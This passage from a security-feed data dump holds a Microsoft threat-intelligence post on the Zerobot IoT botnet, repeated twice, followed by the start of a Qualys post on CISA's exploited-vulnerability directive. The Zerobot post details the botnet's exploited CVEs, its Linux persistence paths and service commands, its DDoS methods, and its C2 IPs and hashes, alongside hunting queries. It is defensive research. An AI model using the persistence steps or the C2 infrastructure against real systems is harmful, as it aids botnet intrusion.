SignatureMatchedContent = tostring(json.SignatureMatchedContent), SignatureSampleContent = tostring(json.SamplePacketContent)\n |where SignatureName == \"HTTP_Client\"\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, SignatureName, SignatureMatchedContent, SignatureSampleContent\n \n\n**Zerobot port knocking**\n\nThis query finds incoming connections from IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"InboundConnectionAccepted\"\n | where Timestamp > ago(30d)\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName\n \n\n### **Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. 
More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\n## Indicators of compromise (IOCs):\n\n**Domains and IP addresses:**\n\n * zero[.]sudolite[.]ml\n * 176.65.137[.]5\n * 176.65.137[.]5:1401\n * 176.65.137[.]6\n * ws[:]//176.65.137[.]5/handle\n * http[:]//176.65.137[.]5:8000/ws\n\n**New Zerobot hashes (SHA-256)**\n\n * aed95a8f5822e9b1cd1239abbad29d3c202567afafcf00f85a65df4a365bedbb\n * bf582b5d470106521a8e7167a5732f7e3a4330d604de969eb8461cbbbbdd9b9a\n * 0a5eebf19ccfe92a2216c492d6929f9cac72ef37089390572d4e21d0932972c8\n * 1e7ca210ff7bedeefadb15a9ec5ea68ad9022d0c6f41c4e548ec2e5927026ba4\n * 05b7517cb05fe1124dd0fad4e85ddf0fe65766a4c6c9986806ae98a427544e9d\n * 5625d41f239e2827eb05bfafde267109549894f0523452f7a306b53b90e847f2\n * c304a9156a032fd451bff49d75b0e9334895604549ab6efaab046c5c6461c8b3\n * 66c76cfc64b7a5a06b6a26976c88e24e0518be3554b5ae9e3475c763b8121792\n * 539640a482aaee2fe743502dc59043f11aa8728ce0586c800193e30806b2d0e5\n * 0f0ba8cc3e46fff0eef68ab5f8d3010241e2eea7ee795e161f05d32a0bf13553\n * 343c9ca3787bf763a70ed892dfa139ba69141b61c561c128084b22c16829c5af\n * 874b0691378091a30d1b06f2e9756fc7326d289b03406023640c978ff7c87712\n * 29eface0054da4cd91c72a0b2d3cda61a02831b4c273e946d7e106254a6225a7\n * 4a4cb8516629c781d5557177d48172f4a7443ca1f826ea2e1aa6132e738e6db2\n * bdfd89bdf6bc2de5655c3fe5f6f4435ec4ad37262e3cc72d8cb5204e1273ccd6\n * 62f23fea8052085d153ac7b26dcf0a15fad0c27621f543cf910e37f8bf822e0e\n * 788e15fd87c45d38629e3e715b0cb93e55944f7c4d59da2e480ffadb6b981571\n * 26e68684f5b76d9016d4f02b8255ff52d1b344416ffc19a2f5c793ff1c2fdc65\n * e4840c5ac2c2c2170d00feadb5489c91c2943b2aa13bbec00dbcffc4ba8dcc2d\n * 45059f26e32da95f4bb5dababae969e7fceb462cdeadf7d141c39514636b905a\n * 77dd28a11e3e4260b9a9b60d58cb6aaaf2147da28015508afbaeda84c1acfe70\n * cf232e7d39094c9ba04b9713f48b443e9d136179add674d62f16371bf40cf8c8\n * 13657b64a2ac62f9d68aeb75737cca8f2ab9f21e4c38ce04542b177cb3a85521\n * 
eb33c98add35f6717a3afb0ab2f9c0ee30c6f4e0576046be9bf4fbf9c5369f71\n * e3dd20829a34caab7f1285b730e2bb0c84c90ac1027bd8e9090da2561a61ab17\n * 3685d000f6a884ca06f66a3e47340e18ff36c16b1badb80143f99f10b8a33768\n * cdc28e7682f9951cbe2e55dad8bc2015c1591f89310d8548c0b7a1c65dbefae3\n * 869f4fb3f185b2d1231d9378273271ddfeebb53085daede89989f9cc8d364f5f\n * 6c59af3ed1a616c238ee727f6ed59e962db70bc5a418b20b24909867eb00a9d6\n * ef28ee3301e97eefd2568a3cb4b0f737c5f31983710c75b70d960757f2def74e\n * 95e4cc13f8388c195a1220cd44d26fcb2e10b7b8bfc3d69efbc51beb46176ff1\n * 62f9eae8a87f64424df90c87dd34401fe7724c87a394d1ba842576835ab48afc\n * 54d1daf58ecd4d8314b791a79eda2258a69d7c69a5642b7f5e15f2210958bdce\n * 8176991f355db10b32b7562d1d4f7758a23c7e49ed83984b86930b94ccc46ab3\n * 8aa89a428391683163f0074a8477d554d6c54cab1725909c52c41db2942ac60f\n * fd65bd8ce671a352177742616b5facc77194cccec7555a2f90ff61bad4a7a0f6\n * 1e66ee40129deccdb6838c2f662ce33147ad36b1e942ea748504be14bb1ee0ef\n * 57f83ca864a2010d8d5376c68dc103405330971ade26ac920d6c6a12ea728d3d\n * 7bfd0054aeb8332de290c01f38b4b3c6f0826cf63eef99ddcd1a593f789929d6\n\n**SparkRat hashes (SHA-256):**\n\n * 0ce7bc2b72286f236c570b1eb1c1eacf01c383c23ad76fd8ca51b8bc123be340\n * cacb77006b0188d042ce95e0b4d46f88828694f3bf4396e61ae7c24c2381c9bf\n * 65232e30bb8459961a6ab2e9af499795941c3d06fdd451bdb83206a00b1b2b88\n\n_**Rotem Sde-Or**, **Ilana Sivan**, **Gil Regev**, Microsoft Defender for IoT Research Team \n**Meitar Pinto**, **Nimrod Roimy**, **Nir Avnery**, Microsoft Defender Research Team \n**Ramin Nafisi**, **Ross Bevington**, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Microsoft research uncovers new Zerobot capabilities](<https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T20:00:00", "type": "mmpc", "title": "Microsoft research uncovers new Zerobot capabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2016-20017", "CVE-2017-17105", "CVE-2017-17106", "CVE-2017-17215", "CVE-2018-10561", "CVE-2018-12613", "CVE-2018-20057", "CVE-2019-10655", "CVE-2020-10987", "CVE-2020-25223", "CVE-2020-25506", "CVE-2020-7209", "CVE-2021-35395", "CVE-2021-36260", "CVE-2021-42013", "CVE-2021-46422", "CVE-2022-22965", "CVE-2022-25075", "CVE-2022-26186", "CVE-2022-26210", "CVE-2022-30023", "CVE-2022-30525", "CVE-2022-31137", "CVE-2022-33891", "CVE-2022-34538", "CVE-2022-37061", "CVE-2022-42013"], "modified": "2022-12-21T20:00:00", "id": "MMPC:0FBB61490D4A94C83AEE14DDEE722297", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2022-12-21T20:16:24", "description": "Botnet malware operations are a constantly evolving threat to devices and networks. 
Threat actors target Internet of Things (IoT) devices for recruitment into malicious operations as IoT devices\u2019 configurations often leave them exposed, and the number of internet-connected devices continues to grow. Recent trends have shown that operators are redeploying malware for a variety of distributions and objectives, modifying existing botnets to scale operations and add as many devices as possible to their infrastructure.\n\nZerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware. The Microsoft Defender for IoT research team has been monitoring Zerobot (also called ZeroStresser by its operators) for months. Zerobot is offered as part of a malware-as-a-service scheme and has been updated several times since Microsoft started to track it. One domain with links to Zerobot was among several domains associated with DDoS-for-hire services [seized by the FBI](<https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites>) in December 2022.\n\nMicrosoft has previously reported on the [evolving threat ecosystem](<https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>). The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks. 
We have tracked advertisements for the Zerobot botnet on various social media networks in addition to other announcements regarding the sale and maintenance of the malware, as well as new capabilities in development.\n\nIn this blog post, we present information about the latest version of the malware, Zerobot 1.1, including newly identified capabilities and further context to Fortinet\u2019s recent [analysis](<https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities>) on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware\u2019s reach to different types of devices. In addition to these findings, we\u2019re sharing new indicators of compromise (IOCs) and recommendations to help defenders protect devices and networks against this threat.\n\n## What is Zerobot?\n\nZerobot affects a variety of devices that include firewall devices, routers, and cameras, adding compromised devices to a distributed denial of service (DDoS) botnet. Using several modules, the malware can infect vulnerable devices built on diverse architectures and operating systems, find additional devices to infect, achieve persistence, and attack a range of protocols. Microsoft tracks this activity as DEV-1061.\n\nThe most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities.\n\nMicrosoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. 
Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## How Zerobot gains and maintains device access\n\nIoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors. Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices. Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.\n\nIn addition to brute force attempts on devices, Zerobot exploits dozens of vulnerabilities, which malware operators add on a rolling basis to gain access and inject malicious payloads. Zerobot 1.1 includes several new vulnerabilities, such as:\n\n**Vulnerability**| **Affected software** \n---|--- \nCVE-2017-17105| Zivif PR115-204-P-RS \nCVE-2019-10655| Grandstream \nCVE-2020-25223| WebAdmin of Sophos SG UTM \nCVE-2021-42013| Apache \nCVE-2022-31137| Roxy-WI \nCVE-2022-33891| Apache Spark \nZSL-2022-5717| MiniDVBLinux \n \nSince the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. 
Microsoft researchers have also identified that previous reports have used the vulnerability ID \u201cZERO-32906\u201d for CVE-2018-20057, \u201cGPON\u201d for CVE-2018-10561, and \u201cDLINK\u201d for CVE-2016-20017; and that CVE-2020-7209 was mislabeled as CVE-2017-17106 and CVE-2022-42013 was mislabeled as CVE-2021-42013.\n\nMicrosoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.\n\nUpon gaining device access, Zerobot injects a malicious payload, which may be a generic script called _zero.sh_ that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary for a specific architecture. The bash script that attempts to download different Zerobot binaries identifies the architecture by brute force, attempting to download and execute binaries for various architectures until one succeeds, since IoT devices run on many different central processing unit (CPU) architectures. Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.\n\nDepending on the operating system of the device, the malware uses different persistence mechanisms. Persistence tactics are used by malware operators to obtain and maintain access to devices. While Zerobot is unable to spread to Windows machines, we have found several samples that can run on Windows. On Windows machines, the malware copies itself to the Startup folder with the file name _FireWall.exe_ (older versions use _my.exe_). Microsoft Defender for Endpoint detects this malware and related malicious activity on both Windows and Linux devices. 
See detection details below.\n\nTo achieve persistence on Linux-based devices, Zerobot uses a combination of desktop entry, daemon, and service methods:\n\n**Desktop entry:**\n\nZerobot copies itself to _$HOME/.config/ssh.service/sshf_ then writes a desktop entry file called _sshf.desktop_ to the same directory. Older Linux versions use _$HOME/.config/autostart_ instead of _$HOME/.config/ssh.service_.\n\n**Daemon:**\n\nCopies itself to _/usr/bin/sshf_ and writes a configuration at _/etc/init/sshf.conf_.\n\n**Service:**\n\nCopies itself to _/etc/sshf_ and writes a service configuration at _/lib/system/system/sshf.service_, then enables the service (to make sure it starts at boot) with two commands:\n\n * _systemctl enable sshf_\n * _service enable sshf_\n\nAll persistence mechanisms on older Linux versions use _my.bin_ and _my.bin.desktop_ instead of _sshf_ and _sshf.desktop._\n\n## New attack capabilities\n\nIn addition to the functions and attacks included in previous versions of the malware, Zerobot 1.1 has additional DDoS attack capabilities. These functions allow threat actors to target resources and make them inaccessible. Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations. In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target.\n\nThe following are the previously known Zerobot capabilities:\n\n**Attack method**| **Description** \n---|--- \nUDP_LEGIT| Sends UDP packets without data. \nMC_PING| Meant for DDoS on Minecraft servers. Sends a handshake and status request. \nTCP_HANDSHAKE| Floods with TCP handshakes. \nTCP_SOCKET| Continuously sends random payloads on an open TCP socket. Payload length is customizable. \nTLS_SOCKET| Continuously sends random payloads on an open TLS socket. Payload length is customizable. 
\nHTTP_HANDLE| Sends HTTP GET requests using a Golang standard library. \nHTTP_RAW| Formats and sends HTTP GET requests. \nHTTP_BYPASS| Sends HTTP GET requests with spoofed headers. \nHTTP_NULL| HTTP headers are each one random byte (not necessarily ASCII). \n \nPreviously undisclosed and new capabilities are the following:\n\n**Attack method**| **Description** \n---|--- \nUDP_RAW| Sends UDP packets where the payload is customizable. \nICMP_FLOOD| Supposed to be an ICMP flood, but the packet is built incorrectly. \nTCP_CUSTOM| Sends TCP packets where the payload and flags are fully customizable. \nTCP_SYN| Sends SYN packets. \nTCP_ACK| Sends ACK packets. \nTCP_SYNACK| Sends SYN-ACK packets. \nTCP_XMAS| Christmas tree attack (all TCP flags are set). The reset cause field is \u201cxmas\u201d. \n \n## How Zerobot spreads\n\nAfter persistence is achieved, Zerobot scans for other internet-exposed devices to infect. The malware randomly generates a number between 0 and 255 and scans all IPs whose first octet is this value. Using a function called _new_botnet_selfRepo_isHoneypot_, the malware tries to identify honeypot IP addresses, network decoys used to attract cyberattacks and collect information on threats and attempts to access resources. This function includes 61 IP subnets, preventing scanning of these IPs.\n\nMicrosoft researchers also identified a sample that can run on Windows based on a cross-platform (Linux, Windows, macOS) open-source remote administration tool (RAT) with various features such as managing processes, file operations, screenshotting, and running commands. This tool was found by investigating the command-and-control (C2) IPs used by the malware. The script used to download this RAT is called _impst.sh_:\n\nFigure 1. 
The _impst.sh_ script used to download the remote administration tool\n\n## Defending devices and networks against Zerobot\n\nThe continuous evolution and rapid addition of new capabilities in the latest Zerobot version underscores the urgency of implementing comprehensive security measures. Microsoft recommends the following steps to protect devices and networks against the threat of Zerobot:\n\n * Use security solutions with cross-domain visibility and detection capabilities like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), which provides integrated defense across endpoints, identities, email, applications, and data. Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect Zerobot malware variants and malicious behavior related to this threat.\n * Adopt a comprehensive IoT security solution such as [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender.\n * Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.\n * Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.\n * Use least-privilege access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.\n * Harden endpoints with a comprehensive Windows security solution:\n * Manage the apps your employees can use through Windows Defender Application Control and, for unmanaged solutions, enable Smart App Control.\n * Perform timely cleanup of all unused and stale executables sitting on your or your organization\u2019s devices.\n\n## Detections\n\n**Microsoft Defender for IoT**\n\nMicrosoft Defender 
for IoT uses detection rules and signatures to identify malicious behavior. Microsoft Defender for IoT has alerts for the following vulnerabilities and exploits which may be tied to Zerobot activity:\n\n * CVE-2014-8361\n * CVE-2016-20017\n * CVE-2017-17105\n * CVE-2017-17215\n * CVE-2018-10561\n * CVE-2018-20057\n * CVE-2019-10655\n * CVE-2020-7209\n * CVE-2020-10987\n * CVE-2020-25506\n * CVE-2021-35395\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2021-46422\n * CVE-2022-22965\n * CVE-2022-25075\n * CVE-2022-26186\n * CVE-2022-26210\n * CVE-2022-30023\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-33891\n * CVE-2022-34538\n * CVE-2022-37061\n * ZERO-36290\n * ZSL-2022-5717\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects the malicious files under the following platforms and threat names:\n\n * Zerobot (Win32/64 and Linux)\n * SparkRat (Win32/64 and Linux)\n\n**Microsoft Defender for Endpoint**\n\nMicrosoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:\n\n * DEV-1061 threat activity group detected\n * An active 'PrivateLoader' malware process was detected while executing\n * 'Morila' malware was prevented\n * 'Multiverze' malware was detected\n\nMicrosoft Defender for Endpoint also has detections for the following vulnerabilities exploited by Zerobot:\n\n * CVE-2022-22965 (Spring4Shell)\n\nMicrosoft Defender for Endpoint's Device Discovery capabilities discover and classify devices. 
With these capabilities, Microsoft 365 Defender customers using Microsoft Defender for IoT have visibility into security recommendations for devices with the following vulnerabilities:\n\n * CVE-2014-8361\n * CVE-2019-10655\n * CVE-2020-25506\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-37061\n\nDevices with these vulnerabilities are also visible in the Microsoft Defender Vulnerability Management inventory.\n\n**Microsoft Defender for Cloud**\n\nMicrosoft Defender for Cloud alerts with the following titles can indicate threat activity on your network:\n\n * VM_ReverseShell\n * VM_SuspectDownloadArtifacts\n * SQL.VM_ShellExternalSourceAnomaly\n * AppServices_CurlToDisk\n\n## Advanced hunting queries\n\n### **Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following queries to find related activity in their networks.\n\n**Zerobot files**\n\nThis query finds the file hashes associated with Zerobot activity.\n \n \n let IoCList = externaldata(TimeGenerated:datetime,IoC:string,IoC_Type:string,ExpirationDateTime:datetime,Description:string, Action:string, ConfidenceScore:real, ThreatType:string, Active:string,Type:string, TrafficLightProtocolLevel:string, \n ActivityGroupNames:string)[@\"https://raw.githubusercontent.com/microsoft/mstic/master/RapidReleaseTI/Indicators.csv\"] \n with(format=\"csv\", ignoreFirstRecord=True);\n let shahashes = IoCList\n | where IoC_Type =~ \"sha256\" and Description =~ \"Dev-1061 Zerobot affecting IoT devices\"\n | distinct IoC;\n DeviceFileEvents\n | where SHA256 in (shahashes)\n\n**Zerobot HTTP requests**\n\nThis query finds suspicious HTTP requests originated by the IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"NetworkSignatureInspected\"\n | where Timestamp > ago(30d)\n | extend json = parse_json(AdditionalFields)\n | extend SignatureName = tostring(json.SignatureName), 
SignatureMatchedContent = tostring(json.SignatureMatchedContent), SignatureSampleContent = tostring(json.SamplePacketContent)\n | where SignatureName == \"HTTP_Client\"\n | project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, SignatureName, SignatureMatchedContent, SignatureSampleContent\n \n\n**Zerobot port knocking**\n\nThis query finds incoming connections from IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"InboundConnectionAccepted\"\n | where Timestamp > ago(30d)\n | project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName\n \n\n### **Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. 
More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\n## Indicators of compromise (IOCs):\n\n**Domains and IP addresses:**\n\n * zero[.]sudolite[.]ml\n * 176.65.137[.]5\n * 176.65.137[.]5:1401\n * 176.65.137[.]6\n * ws[:]//176.65.137[.]5/handle\n * http[:]//176.65.137[.]5:8000/ws\n\n**New Zerobot hashes (SHA-256)**\n\n**SparkRat hashes (SHA-256):**\n\n_**Rotem Sde-Or**, **Ilana Sivan**, **Gil Regev**, Microsoft Defender for IoT Research Team \n**Meitar Pinto**, **Nimrod Roimy**, **Nir Avnery**, Microsoft Defender Research Team \n**Ramin Nafisi**, **Ross Bevington**, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Microsoft research uncovers new Zerobot capabilities](<https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T20:00:00", "type": "mssecure", "title": "Microsoft research uncovers new Zerobot capabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2016-20017", "CVE-2017-17105", "CVE-2017-17106", "CVE-2017-17215", "CVE-2018-10561", "CVE-2018-12613", "CVE-2018-20057", "CVE-2019-10655", "CVE-2020-10987", "CVE-2020-25223", "CVE-2020-25506", "CVE-2020-7209", "CVE-2021-35395", "CVE-2021-36260", "CVE-2021-42013", "CVE-2021-46422", "CVE-2022-22965", "CVE-2022-25075", "CVE-2022-26186", "CVE-2022-26210", "CVE-2022-30023", "CVE-2022-30525", "CVE-2022-31137", "CVE-2022-33891", "CVE-2022-34538", "CVE-2022-37061", "CVE-2022-42013"], "modified": "2022-12-21T20:00:00", "id": "MSSECURE:0FBB61490D4A94C83AEE14DDEE722297", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update their internal vulnerability management procedures within 60 days and to remediate each vulnerability according to the timelines outlined in CISA's vulnerability catalog.\n\nQualys helps customers identify and assess risk to their digital infrastructure and automate remediation. Qualys' guidance for rapid response to the directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. 
You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) is already past due. These vulnerabilities include some of the most significant exploits of the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 vulnerabilities (34%) need to be patched within the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months, or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. 
Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys 
